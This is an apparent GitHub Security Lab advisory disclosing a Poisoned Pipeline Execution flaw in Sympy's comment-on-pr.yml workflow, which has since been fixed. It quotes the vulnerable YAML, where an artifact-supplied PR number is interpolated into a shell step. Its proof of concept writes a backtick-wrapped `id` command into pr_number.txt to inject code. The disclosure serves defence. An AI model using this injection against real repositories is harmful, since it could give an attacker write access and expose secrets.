Coordinated Disclosure Timeline
- 2024-10-30: Reported to maintainers via Email.
- 2024-10-30: Fixed by removing the vulnerable workflow.
Summary
The comment-on-pr.yml
workflow is vulnerable to Poisoned Pipeline Execution (PPE) which may allow a malicious actor to gain write access to the repository and exfiltrate secrets.
Project
Sympy
Tested Version
Latest commit at the time of reporting.
Details
Poisoned Pipeline Execution (PPE) in comment-on-pr.yml
(GHSL-2024-322
)
The comment-on-pr
workflow gets triggered when the test
workflow completes:
on:
workflow_run:
# test is the name given for the workflow in runtests.yml
workflows: ["test"]
types: [completed]
It then downloads an artifact produced by the triggering workflow:
- name: Download benchmarks
uses: dawidd6/action-download-artifact@v6
with:
workflow: runtests.yml
workflow_conclusion: success
name: pr_number
And assign the contents of pr_number
to the steps.pr_number_reader.outputs.pr_number
variable:
- name: Read the PR number
id: pr_number_reader
run: echo "pr_number=$(cat pr_number.txt)" >> $GITHUB_OUTPUT
Finally, it interpolates the contents of this variable into a bash script, enabling a malicious actor to run arbitrary code:
- name: Show PR number
run: echo ${{ steps.pr_number_reader.outputs.pr_number }}
Impact
The workflow runs with full-write permissions so an attacker could gain write access to the repo and exfiltrate secrets:
GITHUB_TOKEN Permissions
Actions: write
Attestations: write
Checks: write
Contents: write
Deployments: write
Discussions: write
Issues: write
Metadata: read
Packages: write
Pages: write
PullRequests: write
RepositoryProjects: write
SecurityEvents: write
Statuses: write
PoC
- Fork the repository
- Create a new branch and modify the
runtests.yml
workflow so it looks like:name: test on: [pull_request] save-pr-number: runs-on: ubuntu-20.04 steps: - name: Write PR number to file run: echo -n '`id`' > pr_number.txt - name: Upload results as artifacts uses: actions/upload-artifact@v4 with: name: pr_number path: pr_number.txt
- Create a Pull Request for this change and sumbit it to sympy/sympy
- Watch the execution of
runtests.yml
andcomment-on-pr.yml
which should show the output of theid
command.
Credit
This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).
Contact
You can contact the GHSL team at securitylab@github.com
, please include a reference to GHSL-2024-322
in any communication regarding this issue.